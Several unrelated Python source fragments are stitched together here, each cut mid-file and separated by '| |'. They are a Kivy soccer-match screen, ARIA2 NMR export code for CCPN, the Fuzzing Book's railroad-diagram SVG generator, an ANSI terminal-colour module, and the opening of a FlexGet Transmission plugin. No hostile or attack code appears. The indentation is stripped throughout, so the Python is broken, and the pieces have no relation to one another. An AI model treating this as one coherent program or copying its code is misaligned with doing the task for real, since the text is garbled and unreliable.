if self.data.team_two_name != "":
if len(self.data.team_two_name) >= 20:
create_popup("soccer match", "Player two's name must be less then 20 charactres")
return
if self.data.team_one_name != "" and self.data.team_two_name != "":
if self.data.team_one_name == self.data.team_two_name:
create_popup("soccer match", "teams one and two cannot both have the same names")
return
app.data.run_soccer_match.team_one_score = 0
app.data.run_soccer_match.team_two_score = 0
temp = app.root.get_screen('WaitForPlayers')
temp.reset_screen("RunSoccer", "Team", self.name, "GO!!!")
app.root.current = 'WaitForPlayers'
root.manager.transition.direction = 'left'
class ManualSoccerScoreAdjustmentScreen(Screen):
pass
class RunSoccerScreen(Screen):
data = ObjectProperty(None, allownone=False)
PauseGameStr = "Pause\nGame"
ResumeGameStr = "Resume\nGame"
pause_play_button_text = StringProperty("Pause\nGame")
cd_lights = NumericProperty()
def __init__(self, **kwargs):
self.register_event_type("on_max_score_reached")
super(RunSoccerScreen, self).__init__(**kwargs)
def on_pre_enter(self):
App.get_running_app().open_player_1_door(3)
App.get_running_app().open_player_2_door(3)
def on_data(self, instance, value):
self.data.bind(team_one_score=self.on_team_one_scored,
team_two_score=self.on_team_one_scored)
def on_pause_play_button_text(self, instance, value):
pass
def _do_resume(self, deltaTime):
self.ids.countDownClock.resume()
self.pause_play_button_text = RunSoccerScreen.PauseGameStr
def play_pause_pressed(self):
if self.pause_play_button_text == RunSoccerScreen.PauseGameStr:
self.ids.countDownClock.pause()
App.get_running_app().send_pause_soccer_cmd(self.ids.countDownClock.seconds)
else:
match_start_time = round(time.time() * 1000) + 300
App.get_running_app().send_resume_soccer_cmd(match_start_time, self.ids.countDownClock.seconds)
Clock.schedule_once(self._do_resume, 0.3)
def pause_count_down(self):
Animation.cancel_all(self)
def _do_resume_count_down(self, duration, *Args):
| |
= pickler()
p.dump(spectrum, filename, gzip = 0)
self.debug('Time: %ss' % str(clock()-t))
self.message('Assigned spectrum "%s" written to file %s"' \
% (spectrum.getName(), filename))
def _dump_ccpn(self, iteration, path, is_water_refinement=False):
from aria.Singleton import ProjectSingleton
project = ProjectSingleton()
if project.ccpn_project_instance is None:
return
## # BARDIAUX 2.3 : when solvent molec present, abort CCPN PDB export
## write_solvent = self.getSettings()['water_refinement']['write_solvent_molecules']
## if is_water_refinement and write_solvent == YES:
## msg = 'CCPN export: Solvent refined structures contain solvent molecules.' + \
## 'PDB files will not be exported.'
## self.warning(msg)
## return
# BARDIAUX 2.3
try:
import aria.exportToCcpn as ccpnExport
except:
self.warning('CCPNmr Analysis not found. CCPN export aborted.')
return
from aria.importFromCcpn import getKeysFromString
project_settings = project.getSettings()
run_name = project_settings['run'].strip().replace(' ', '_')
file_root = project_settings['file_root'].strip().replace(' ', '_')
ccpn_project = project.ccpn_project_instance
nmrProject = ccpn_project.currentNmrProject or ccpn_project.findFirstNmrProject()
## TBD: proper handling of NMR projects, e.g. the case in which
## multiple NMR projects exist.
if not nmrProject:
self.message('CCPN export: No NMR project found, creating new one.')
name = 'ARIA2_run_%s' % run_name
nmrProject = ccpn_project.newNmrProject(name=name)
s = project.getReporter()['ccpn']
export = 0
# TJS: Includes inactive ones as these are
# now passed back to CCPN (and marked)
restraints = iteration.getPeakList()
# BARDIAUX: Update for multiple chains
aria_chain = project.getMolecule().get_chains()[0]
chains = ccpnExport.getChainsFromAria2(restraints, ccpn_project,
aria_chain=aria_chain)
# TJS: Get Run object for CCPN to group objects
# If data comes from CCPN, this would have been made
# in Extend-NMR GUI or at load time
if chains:
ccpnMolSystem = chains[0].molSystem
ccpnAriaRun = ccpnExport.getAriaRun(ccpnMolSystem)
ask_water = self.getSettings()['water_refinement']['enabled'] == YES
is_last_iteration = iteration.getNumber() == project.getSettings()['n_iterations']-1
if ccpnAriaRun:
# TJS: Completed runs will not be used again after this
if (is_water_refinement and ask_water) or \
(is_last_iteration and not ask_water):
ccpnAriaRun.status = 'completed'
else:
ccpnAriaRun = None
# TJS: Export structures before restraints & peaks thus
# we have to link NmrConstraintStore to the structure generation
# at the very end
struct_gen = None
if s['export_structures'] == YES and \
(is_last_iteration or is_water_refinement):
export = 1
# TJS: Moved above beacause chains needed for CCPn Run Object
# chains = ccpnExport.getChainsFromAria2(restraints, ccpn_project,
# aria_chain=aria_chain)
if not chains:
self.warning('CCPN export: No molecular system found.')
return
structures = ccpnExport.getStructuresFromAria2Dir(path, chains)
if not structures:
self.warning('CCPN export: Unable to load any structures from iteration directory %s' % path)
else:
self.message('CCPN export: PDB files exported.')
if not is_water_refinement:
name = 'ARIA2_run_%s_it%d' % (run_name, iteration.getNumber())
details = 'Structures created by ARIA2, %s run "%s", iteration %d.' % \
(file_root, run_name, iteration.getNumber())
else:
name = 'ARIA2_run_%s_water_refine' % (run_name,)
details = 'Structures created by ARIA2, %s run "%s", water refinement.' % \
(file_root, run_name)
# TJS: Structure generation is the old way of storing results
struct_gen = ccpnExport.makeStructureGeneration(structures, None)
struct_gen.name = name
struct_gen.details = details
# TJS: Store ARIA generated data as output of CCPN NmrCalc run
if ccpnAriaRun:
dataObj = ccpnAriaRun.newStructureEnsembleData(ensembleId=structures.ensembleId,
molSystemCode=chains[0].molSystem.code,
ioRole='output', name=name,
details=details)
else:
structures = None
if not is_water_refinement and (s['export_noe_restraint_list'] == 'all' or \
(s['export_noe_restraint_list'] == 'last' and \
is_last_iteration)):
export = 1
if self.constraintSetSerial is not None:
constraintSet = nmrProject.findFirstNmrConstraintStore(serial=self.constraintSetSerial)
self.message('CCPN export: Using existing constraint set.')
else:
self.message('CCPN export: Creating new constraint set.')
constraintSet = ccpnExport.makeNmrConstraintStore(nmrProject)
self.constraintSetSerial = constraintSet.serial
# TJS: Link back to any structure generation object
if struct_gen:
struct_gen.nmrConstraintStore = constraintSet
# BARDIAUX: Update for multiple chains
chains = ccpnExport.getChainsFromAria2(restraints, ccpn_project,
aria_chain=aria_chain)
if restraints:
# TJS expert rejected (not active) restraints back to CCPN for analysis
constrList, rejectList, violList = ccpnExport.getConstraintsFromAria2(restraints, chains, constraintSet,
structures)
constrList.name = 'ARIA2_run%s_NOEs_it%d' % (run_name, iteration.getNumber())
constrList.details = 'ARIA2 NOEs, project "%s", run "%s", iteration %d.' % \
(file_root, run_name, iteration.getNumber())
# TJS: Store ARIA generated data as output of CCPN NmrCalc run
if ccpnAriaRun:
cSet = constraintSet.serial
dataObj = ccpnAriaRun.newConstraintStoreData(constraintStoreSerial=cSet,
constraintListSerials=[constrList.serial],
ioRole='output', name=constrList.name,
details=constrList.details)
# TJS constraint list contaning the inactive restraints
if rejectList is not None:
rejectList.name = 'ARIA2_REJECT_run%s_NOEs_it%d' % (run_name, iteration.getNumber())
rejectList.details = 'ARIA2 *INACTIVE* NOEs, project "%s", run "%s", iteration %d.' % \
(file_root, run_name, iteration.getNumber())
# TJS: Store ARIA generated data as output of CCPN NmrCalc run
if ccpnAriaRun:
cSet = constraintSet.serial
dataObj = ccpnAriaRun.newConstraintStoreData(constraintStoreSerial=cSet,
constraintListSerials=[rejectList.serial],
ioRole='output', name=rejectList.name,
details=rejectList.details)
self.message('CCPN export: NOE restraint list exported.')
# BARDIAUX export Constraints from CCPN
for orig_list, distance_constraints in iteration.getDistanceRestraints().items():
# TJS adjust; we want the inactive too. ;-)
# distance_constraints = [r for r in distance_constraints if r.isActive()]
constrList, rejectList, violList = ccpnExport.getConstraintsFromAria2(distance_constraints, chains,
constraintSet, structures)
# TJS adjust
ccpnKeys = getKeysFromString(orig_list.getDataSource().get('ccpn_id'))
list_id = '%s|%s' % (ccpnKeys[-2],ccpnKeys[-1])# Project id is too verbose and redundant inside same project
constrList.name = 'ARIA2_run%s_Dists_%s_it%d' % (run_name, list_id, iteration.getNumber())
constrList.details = 'ARIA2 Distances %s, project "%s", run "%s", iteration %d.' % \
(orig_list.getName(), file_root, run_name, iteration.getNumber())
# TJS: Store ARIA generated data as output of CCPN NmrCalc run
if ccpnAriaRun:
cSet = constraintSet.serial
dataObj = ccpnAriaRun.newConstraintStoreData(constraintStoreSerial=cSet,
constraintListSerials=[constrList.serial],
ioRole='output', name=constrList.name,
details=constrList.details)
# TJS constraint list contaning the inactive restraints
if rejectList is not None:
rejectList.name = 'ARIA2_REJECT_run%s_Dists_%s_it%d' % (run_name, list_id, iteration.getNumber())
rejectList.details = 'ARIA2 *INACTIVE* Distances %s, project "%s", run "%s", iteration %d.' % \
(orig_list.getName(), file_root, run_name, iteration.getNumber())
# TJS: Store ARIA generated data as output of CCPN NmrCalc run
if ccpnAriaRun:
cSet = constraintSet.serial
dataObj = ccpnAriaRun.newConstraintStoreData(constraintStoreSerial=cSet,
constraintListSerials=[rejectList.serial],
ioRole='output', name=rejectList.name,
details=rejectList.details)
self.message('CCPN export: DistanceConstraints list exported.')
if not is_water_refinement and (s['export_assignments'] == YES and is_last_iteration):
import aria.DataContainer as DC
export = 1
## compile dict that maps peaklist keys to name of new peaklist
ccpn_spectra = [x for x in project.ccpn_data_sources.get(DC.DATA_SPECTRUM, ())]
names_dict = {}
template = 'ARIA2_NOE_Peaks_run%s_it%d_%s'
for x in ccpn_spectra:
ccpn_id = x['peaks']['ccpn_id']
args = run_name, iteration.getNumber(), ccpn_id
names_dict[ccpn_id] = template % args
peak_list_keys = ccpnExport.getPeakAssignmentsFromAria2(ccpn_project, restraints, namesDict=names_dict,
aria_chain=aria_chain)
# TJS: Store ARIA generated data as output from run
if ccpnAriaRun and peak_list_keys:
from aria.importFromCcpn import getCcpnPeakList
for peak_list_key in peak_list_keys:
ccpnPeakList = getCcpnPeakList(ccpn_project, peak_list_key)
if ccpnPeakList:
spectrum = ccpnPeakList.dataSource
eSerial = spectrum.experiment.serial
sSerial = spectrum.serial
pSerial = ccpnPeakList.serial
details = ccpnPeakList.details
plId = '%d|%d|%d' % (eSerial, sSerial, pSerial)
name = template % (run_name, iteration.getNumber(), plId)
ccpnAriaRun.newPeakListData(experimentSerial=eSerial,
dataSourceSerial=sSerial,
peakListSerial=pSerial,
ioRole='output',
details=details,
name=name[:80])
self.message('CCPN export: NOE assignments exported.')
if export:
try:
ccpn_project.saveModified()
except Exception, msg:
self.warning('CCPN export: Could not save project. Error message was: %s' % msg) #by AWSS, msg is an object not a string
self.message('CCPN project saved.')
def _dump_iteration(self, iteration, path):
import os
import aria.Iteration as Iteration
filename = os.path.join(path, REPORT_SUMMARY)
pickler = Iteration.IterationTextPickler()
pickler.dump(iteration, filename)
## BARDIAUX 2.2
def _dump_rms(self, peaks, iteration_number):
import aria.RmsReport as RmsReport
infra = self.getInfrastructure()
text_path = infra.get_iteration_path(iteration_number)
graphics_path = infra.get_iteration_graphics_path(iteration_number)
rp = RmsReport.RmsReport(peaks, iteration_number, text_path, graphics_path)
rp.go()
def dumpIteration(self, iteration):
import os
from aria.Singleton import ProjectSingleton
project = ProjectSingleton()
check_type(iteration, 'Iteration')
infra = self.getInfrastructure()
path = infra.get_iteration_path(iteration.getNumber())
# BARDIAUX 2.2
# dump also CCPN DistanceRestraints
# all_peaks = iteration.getPeaks()
all_peaks = {}
all_peaks.update(iteration.getPeaks())
all_peaks.update(iteration.getDistanceRestraints())
order = all_peaks.keys()
order.sort()
peak_list = []
for spectrum in order:
peaks = all_peaks[spectrum]
## sort peak_list wrt ref_peak number
peaks.sort(lambda a, b, c = cmp: \
c(a.getReferencePeak().getNumber(), \
b.getReferencePeak().getNumber()))
peak_list += peaks
## BARDIAUX 25/04/05
# Dump updated spectrum
if is_type(spectrum, 'ConstraintList'):
# Not for CCPN ConstraintList
continue
spec_name = spectrum.getName()
spec_name = spec_name.replace(' ','_')
filename = os.path.join(path, spec_name + \
REPORT_UPDATED_SPECTRUM +'.xml')
s = project.getReporter()['spectra']
if s['iteration'] == 'all' or \
(s['iteration'] == 'last' and \
iteration.getNumber() == project.getSettings()['n_iterations']-1):
self._dump_spectra(peaks, spectrum, filename)
self._dump_peak_list(peak_list, path)
self._dump_iteration(iteration, path)
self._dump_ccpn(iteration, path)
## BARDIAUX 2.2
## RMS report
if peak_list and iteration.getNumber() > 0:
try:
self._dump_rms(peak_list, iteration.getNumber())
#except:
# self.message('Error during RMS analysis/graphics generation.')
except Exception, msg:
import aria.tools as tools
self.warning(tools.last_traceback())
msg = 'Error during RMS analysis/graphics generation.'
self.warning(msg)
self.__reports_written = 1
def reportsWritten(self):
"""
returns 1 if any report files have been written.
"""
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This material is part of "The Fuzzing Book".
# Web site: https://www.fuzzingbook.org/html/RailroadDiagrams.html
# Last change: 2019-01-04 16:03:17+01:00
#
#!/
# Copyright (c) 2018-2019 Saarland University, CISPA, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# # Railroad Diagrams
if __name__ == "__main__":
print('# Railroad Diagrams')
if __name__ == "__main__":
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
import re
import io
class C:
# Display constants
DEBUG = False # if true, writes some debug information into attributes
VS = 8 # minimum vertical separation between things. For a 3px stroke, must be at least 4
AR = 10 # radius of arcs
DIAGRAM_CLASS = 'railroad-diagram' # class to put on the root <svg>
# is the stroke width an odd (1px, 3px, etc) pixel length?
STROKE_ODD_PIXEL_LENGTH = True
# how to align items when they have extra space. left/right/center
INTERNAL_ALIGNMENT = 'center'
# width of each monospace character. play until you find the right value
# for your font
CHAR_WIDTH = 8.5
COMMENT_CHAR_WIDTH = 7 # comments are in smaller text by default
DEFAULT_STYLE = '''\
svg.railroad-diagram {
background-color:hsl(100,100%,100%);
}
svg.railroad-diagram path {
stroke-width:3;
stroke:black;
fill:rgba(0,0,0,0);
}
svg.railroad-diagram text {
font:bold 14px monospace;
text-anchor:middle;
}
svg.railroad-diagram text.label{
text-anchor:start;
}
svg.railroad-diagram text.comment{
font:italic 12px monospace;
}
svg.railroad-diagram rect{
stroke-width:3;
stroke:black;
fill:hsl(0,62%,82%);
}
'''
def e(text):
text = re.sub(r"&", '&', str(text))
text = re.sub(r"<", '<', str(text))
text = re.sub(r">", '>', str(text))
return str(text)
def determineGaps(outer, inner):
diff = outer - inner
if C.INTERNAL_ALIGNMENT == 'left':
return 0, diff
elif C.INTERNAL_ALIGNMENT == 'right':
return diff, 0
else:
return diff / 2, diff / 2
def doubleenumerate(seq):
length = len(list(seq))
for i, item in enumerate(seq):
yield i, i - length, item
def addDebug(el):
if not C.DEBUG:
return
el.attrs['data-x'] = "{0} w:{1} h:{2}/{3}/{4}".format(
type(el).__name__, el.width, el.up, el.height, el.down)
class DiagramItem(object):
def __init__(self, name, attrs=None, text=None):
self.name = name
# up = distance it projects above the entry line
# height = distance between the entry/exit lines
# down = distance it projects below the exit line
self.height = 0
self.attrs = attrs or {}
self.children = [text] if text else []
self.needsSpace = False
def format(self, x, y, width):
raise NotImplementedError # Virtual
def addTo(self, parent):
parent.children.append(self)
return self
def writeSvg(self, write):
write(u'<{0}'.format(self.name))
for name, value in sorted(self.attrs.items()):
write(u' {0}="{1}"'.format(name, e(value)))
write(u'>')
if self.name in ["g", "svg"]:
write(u'\n')
for child in self.children:
if isinstance(child, DiagramItem):
child.writeSvg(write)
else:
write(e(child))
write(u'</{0}>'.format(self.name))
def __eq__(self, other):
return isinstance(self, type(
other)) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Path(DiagramItem):
def __init__(self, x, y):
self.x = x
self.y = y
DiagramItem.__init__(self, 'path', {'d': 'M%s %s' % (x, y)})
def m(self, x, y):
self.attrs['d'] += 'm{0} {1}'.format(x, y)
return self
def ll(self, x, y): # was l(), which violates PEP8 -- AZ
self.attrs['d'] += 'l{0} {1}'.format(x, y)
return self
def h(self, val):
self.attrs['d'] += 'h{0}'.format(val)
return self
def right(self, val):
return self.h(max(0, val))
def left(self, val):
return self.h(-max(0, val))
def v(self, val):
self.attrs['d'] += 'v{0}'.format(val)
return self
def down(self, val):
return self.v(max(0, val))
def up(self, val):
return self.v(-max(0, val))
def arc_8(self, start, dir):
# 1/8 of a circle
arc = C.AR
s2 = 1 / math.sqrt(2) * arc
s2inv = (arc - s2)
path = "a {0} {0} 0 0 {1} ".format(arc, "1" if dir == 'cw' else "0")
sd = start + dir
if sd == 'ncw':
offset = [s2, s2inv]
elif sd == 'necw':
offset = [s2inv, s2]
elif sd == 'ecw':
offset = [-s2inv, s2]
elif sd == 'secw':
offset = [-s2, s2inv]
elif sd == 'scw':
offset = [-s2, -s2inv]
elif sd == 'swcw':
offset = [-s2inv, -s2]
elif sd == 'wcw':
offset = [s2inv, -s2]
elif sd == 'nwcw':
offset = [s2, -s2inv]
elif sd == 'nccw':
offset = [-s2, s2inv]
elif sd == 'nwccw':
offset = [-s2inv, s2]
elif sd == 'wccw':
offset = [s2inv, s2]
elif sd == 'swccw':
offset = [s2, s2inv]
elif sd == 'sccw':
offset = [s2, -s2inv]
elif sd == 'seccw':
offset = [s2inv, -s2]
elif sd == 'eccw':
offset = [-s2inv, -s2]
elif sd == 'neccw':
offset = [-s2, -s2inv]
path += " ".join(str(x) for x in offset)
self.attrs['d'] += path
return self
def arc(self, sweep):
x = C.AR
y = C.AR
if sweep[0] == 'e' or sweep[1] == 'w':
x *= -1
if sweep[0] == 's' or sweep[1] == 'n':
y *= -1
cw = 1 if sweep == 'ne' or sweep == 'es' or sweep == 'sw' or sweep == 'wn' else 0
self.attrs['d'] += 'a{0} {0} 0 0 {1} {2} {3}'.format(C.AR, cw, x, y)
return self
def format(self):
self.attrs['d'] += 'h.5'
return self
def __repr__(self):
return 'Path(%r, %r)' % (self.x, self.y)
def wrapString(value):
return value if isinstance(value, DiagramItem) else Terminal(value)
class Style(DiagramItem):
def __init__(self, css):
self.name = 'style'
self.css = css
self.height = 0
self.width = 0
self.needsSpace = False
def __repr__(self):
return 'Style(%r)' % css
def format(self, x, y, width):
return self
def writeSvg(self, write):
# Write included stylesheet as CDATA. See
# https:#developer.mozilla.org/en-US/docs/Web/SVG/Element/style
cdata = u'/* <![CDATA[ */\n{css}\n/* ]]> */\n'.format(css=self.css)
write(u'<style>{cdata}</style>'.format(cdata=cdata))
class Diagram(DiagramItem):
def __init__(self, *items, **kwargs):
# Accepts a type=[simple|complex] kwarg
DiagramItem.__init__(
self, 'svg', {'class': C.DIAGRAM_CLASS, 'xmlns': "http://www.w3.org/2000/svg"})
self.type = kwargs.get("type", "simple")
self.items = [wrapString(item) for item in items]
if items and not isinstance(items[0], Start):
self.items.insert(0, Start(self.type))
if items and not isinstance(items[-1], End):
self.items.append(End(self.type))
self.css = kwargs.get("css", C.DEFAULT_STYLE)
if self.css:
self.items.insert(0, Style(self.css))
self.up = 0
self.down = 0
self.height = 0
self.width = 0
for item in self.items:
if isinstance(item, Style):
continue
self.width += item.width + (20 if item.needsSpace else 0)
self.up = max(self.up, item.up - self.height)
self.height += item.height
self.down = max(self.down - item.height, item.down)
if self.items[0].needsSpace:
self.width -= 10
if self.items[-1].needsSpace:
self.width -= 10
self.formatted = False
def __repr__(self):
if self.css:
items = ', '.join(map(repr, self.items[2:-1]))
else:
items = ', '.join(map(repr, self.items[1:-1]))
pieces = [] if not items else [items]
if self.css != C.DEFAULT_STYLE:
pieces.append('css=%r' % self.css)
if self.type != 'simple':
pieces.append('type=%r' % self.type)
return 'Diagram(%s)' % ', '.join(pieces)
def format(self, paddingTop=20, paddingRight=None,
paddingBottom=None, paddingLeft=None):
if paddingRight is None:
paddingRight = paddingTop
if paddingBottom is None:
paddingBottom = paddingTop
if paddingLeft is None:
paddingLeft = paddingRight
x = paddingLeft
y = paddingTop + self.up
g = DiagramItem('g')
if C.STROKE_ODD_PIXEL_LENGTH:
g.attrs['transform'] = 'translate(.5 .5)'
for item in self.items:
if item.needsSpace:
Path(x, y).h(10).addTo(g)
x += 10
item.format(x, y, item.width).addTo(g)
x += item.width
y += item.height
if item.needsSpace:
Path(x, y).h(10).addTo(g)
x += 10
self.attrs['width'] = self.width + paddingLeft + paddingRight
self.attrs['height'] = self.up + self.height + \
self.down + paddingTop + paddingBottom
self.attrs['viewBox'] = "0 0 {width} {height}".format(**self.attrs)
g.addTo(self)
self.formatted = True
return self
def writeSvg(self, write):
if not self.formatted:
self.format()
return DiagramItem.writeSvg(self, write)
def parseCSSGrammar(self, text):
token_patterns = {
'keyword': r"[\w-]+\(?",
'type': r"<[\w-]+(\(\))?>",
'char': r"[/,()]",
'literal': r"'(.)'",
'openbracket': r"\[",
'closebracket': r"\]",
'closebracketbang': r"\]!",
'bar': r"\|",
'doublebar': r"\|\|",
'doubleand': r"&&",
'multstar': r"\*",
'multplus': r"\+",
'multhash': r"#",
'multnum1': r"{\s*(\d+)\s*}",
| |
""" This module deals with support of the color in the terminal through ANSI
escape codes. It defines the high level class ColoredStr which is a string
containing color escape codes ready to be printed in color to the terminal.
"""
import re
# There are three possible types of ANSI escape codes to print text in colors:
# - the first one accepts an integer in the range [0;7] which indicates one of
# the primary colors among black, red, green, yellow, blue, magenta, cyan,
# and white, in order. This escape code can actually be mixed with another
# one that put the text in bold and which has the side effect of making the
# color brighter (the normal 8 colors are quite dark). I chose not to deal
# with this second code.
# - the second one accepts an integer in the range [0;255] indicating a color
# among a specific palette of 256 colors. In the UNIX world, most terminals
# work with the x-term palette. Such a palette follows a specific pattern
# and conversions between RGB and code-point in the palette can be computed
# without carying a whole lookup table.
# - the third one accepts three integers in the range [0;255] defining the
# color in RGB coordinates.
# Support of these codes varies from one terminal to another. Most program
# that prints stuff in color stick to the 8 basic colors, which are widely
# supported. I prefer to let the user chose what he wants to use via a
# configuration file. Using an unsupported escape code can result in no color
# at all, a wrong color, or the escape code being printed literally.
ANSI_TEMPLATES = {
'8': '\33[3{}m', # Basic 8 colors
'xterm-256': '\33[38;5;{}m', # 256 colors
'rgb': '\33[38;2;{};{};{}m' # 24-bit RGB true colors
}
# ANSI escape codes are switches, turning on a given behaviour for all the
# text following it. This escape code resets all previous things turned on,
# making the text normal again
ANSI_RESET = '\33[0m'
# The 8 basic colors for the most basic escape code
BASIC_COLORS = [
'black',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white'
]
# Their RGB equivalent. A bit of cheating is involved here. As I said, the 8
# basic colors (not mixed with bold font) are quite dark. That's because their
# equivalent RGB colors are made of coordinates set at value 128, not 255.
# Here I use 255 for convenience with the rest of the program.
BASIC_RGB = [
(0, 0, 0),
(205, 0, 0),
(0, 205, 0),
(205, 205, 0),
(0, 0, 238),
(205, 0, 205),
(0, 205, 205),
(229, 229, 229)
]
# Python's re doesn't support repeated capture :s
RGB_REGEX = 'rgb\(([0-9]{1,3}),([0-9]{1,3}),([0-9]{1,3})\)'
HEXA_REGEX = '#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})'
# The following constants deals with the nature of the x-term 256 colors
# palette:
# http://www.calmar.ws/vim/256-xterm-24bit-rgb-color-chart.html
# The x-term palette is structured as follows:
# - Codes in [0;7] are the 8 primary colors (the same supported by the most
# basic escape code)
# - Codes in [9;15] are also the primary colors, but the bright version (the
# same supported by the most basic escape code when combined with bold)
# - Codes in [16;231] are all the various colors constructed as follows: (R,
# G, B) coordinates are incremented by regular steps. The first step is a
# 95 increment. the 4 following steps are 40 increments. (95+4*40 = 255).
# So, for example, 16 = (0, 0, 0), 17 = (0, 0, 95), 18 = (0, 0, 135), ...,
# 21 = (0, 0, 255), 22 = (0, 95, 0), 23 = (0, 95, 95), and so on all the
# way up to 231 = (255, 255, 255)
# - Codes in [232;255] are gray levels (R = G = B). It starts at (8, 8, 8)
# and increments by steps of 10, arriving at (238, 238, 238) after 23
# steps.
# The steps
XTERM_JUMPS = [95, 40, 40, 40, 40]
# The number of code values between an increments for each of the coordinates.
# For example, 36 code values separate (0, 0, 0) from (95, 0, 0), 6 code
# values separate (0, 0, 0) from (0, 95, 0) and, of course, 1 code value
# separate (0, 0, 0) from (0, 0, 95).
# To convert an x-term code value to RGB (after having removed the
# 16-offset), you first divide by 36. The quotient gives you the number of
# steps to apply to R. You then divide the remainder by 6, which gives you the
# number of steps to apply to G. The final remainder is the number of steps to
# apply yo B.
XTERM_COEFF = [36, 6, 1]
XTERM_GRAY_LEVELS_START = 8
XTERM_GRAY_LEVELS_OFFSET = 232
XTERM_COLORS_OFFSET = 16
DEFAULT = 'default'
# The goal of this module is to allow the user to chose the palette he wants
# to use, without requiring consistency between the palette and the way the
# color is specified. For example, the user might use the x-term 256 palette
# and give a color in RGB. The module automatically makes the conversion from
# RGB to the corresponding value between 0 and 255.
# This function, given a color and a palette, returns the values to be
# inserted into the escape code corresponding to the given palette.
# It applies the following strategy: if the color is given in a format
# consistant with the palette, then it directly extracts the values from the
# color and return them. Otherwise, it converts the color to RGB and then
# converts the RGB to the format suited for the palette (or just stops at RGB
# if RGB is the format suited).
def get_color_values(color, palette):
"""Returns a tuple of values to be inserted into the escape code
corresponding to `palette`.
color: a string describing a color. Accepted formats are:
- one of the string in `BASIC_COLORS`
- the decimal representation of a number between 0 and 255 (for 256
colors palettes)
- a string in the form "rgb(R,G,B)" where R, G and B are integers
between 0 and 255
- a string in the form "#aabbcc" where aa, bb, and cc are the
hexadecimal representation of integers between 0 and 255
palette: one of the keys of `PALETTES`
"""
rgb = None
if color in BASIC_COLORS:
index = BASIC_COLORS.index(color)
if palette == '8':
return (index,)
else:
rgb = tuple(255 if c > 0 else 0 for c in BASIC_RGB[index])
elif is_in_palette(color):
if palette == 'xterm-256':
return (int(color),)
else:
rgb = xterm_palette_to_rgb(color)
else:
rgb_match = re.match(RGB_REGEX, color)
if rgb_match is not None:
rgb = rgb_match.groups()
rgb = tuple(int(c) for c in rgb)
else:
hexa_match = re.match(HEXA_REGEX, color)
if hexa_match is not None:
rgb = hexa_match.groups()
rgb = tuple(int(c, 16) for c in rgb)
if (rgb_match is not None or hexa_match is not None) \
and palette == 'rgb':
return rgb
if rgb is not None:
if palette == '8':
return (rgb_to_basic(rgb),)
elif palette == 'xterm-256':
return (rgb_to_xterm_palette(rgb),)
elif palette == 'rgb':
return rgb
def is_in_palette(color):
try:
value = int(color)
except ValueError:
return False
return 0 <= value <= 255
def rgb_to_basic(rgb):
bits = tuple(1 if c >= 128 else 0 for c in rgb)
for i, color in enumerate(BASIC_RGB):
if bits == tuple(1 if c > 0 else 0 for c in color):
return i
def xterm_palette_to_rgb(color):
color = int(color)
# Basic colors
if color <= 7:
return BASIC_RGB[color]
if 8 <= color <= 15:
return tuple(255 if c > 0 else 0 for c in BASIC_RGB[color - 8])
# Gray levels
if XTERM_GRAY_LEVELS_OFFSET <= color <= 255:
return (8 + 10*(color - XTERM_GRAY_LEVELS_OFFSET),) * 3
# Other colors
value = color - XTERM_COLORS_OFFSET
mod = value
rgb = []
for c in XTERM_COEFF:
val, mod = divmod(mod, c)
rgb.append(sum(XTERM_JUMPS[:val]))
return tuple(rgb)
def rgb_to_xterm_palette(rgb):
result = None
r, g, b = rgb
# Gray levels
if r == g == b:
if r < 4:
result = 0
elif r > 246:
result = 15
elif 238 <= r <= 246:
result = 255
else:
value, mod = divmod(r - XTERM_GRAY_LEVELS_START, 10)
if mod > 4:
value += 1
result = XTERM_GRAY_LEVELS_OFFSET + value
# Other colors
total = 0
for index, c in enumerate(rgb):
prev_tot, tot = 0, 0
i = 0
while tot < c and i < len(XTERM_JUMPS):
prev_tot = tot
tot += XTERM_JUMPS[i]
i += 1
val = i if abs(tot - c) <= abs(prev_tot - c) else i-1
total += val * XTERM_COEFF[index]
result = XTERM_COLORS_OFFSET + total
return result
class ColoredStr(str):
def __new__(cls, string, color, palette='xterm-256'):
if color == DEFAULT:
return string
values = get_color_values(color.lower(), palette)
ansi_seq = get_escape(color, palette)
literal = ansi_seq + string + ANSI_RESET
the_string = super().__new__(cls, literal)
the_string.length = len(string)
the_string.true_length = len(the_string)
the_string.lenesc = len(ansi_seq) + len(ANSI_RESET)
the_string.original = string
return the_string
def __len__(self):
return self.length
def __iter__(self):
return | |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from future.moves.urllib.parse import urlparse
from future.utils import text_to_native_str
import os
import logging
import base64
import re
from datetime import datetime
from datetime import timedelta
from netrc import netrc, NetrcParseError
from time import sleep
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils.template import RenderError
from flexget.utils.pathscrub import pathscrub
from flexget.utils.tools import parse_timedelta
from flexget.config_schema import one_or_more
from fnmatch import fnmatch
try:
import transmissionrpc
from transmissionrpc import TransmissionError
from transmissionrpc import HTTPHandlerError
except ImportError:
# If transmissionrpc is not found, errors will be shown later
pass
log = logging.getLogger('transmission')
class TransmissionBase(object):
def __init__(self):
self.client = None
self.opener = None
def prepare_config(self, config):
if isinstance(config, bool):
config = {'enabled': config}
config.setdefault('enabled', True)
config.setdefault('host', 'localhost')
config.setdefault('port', 9091)
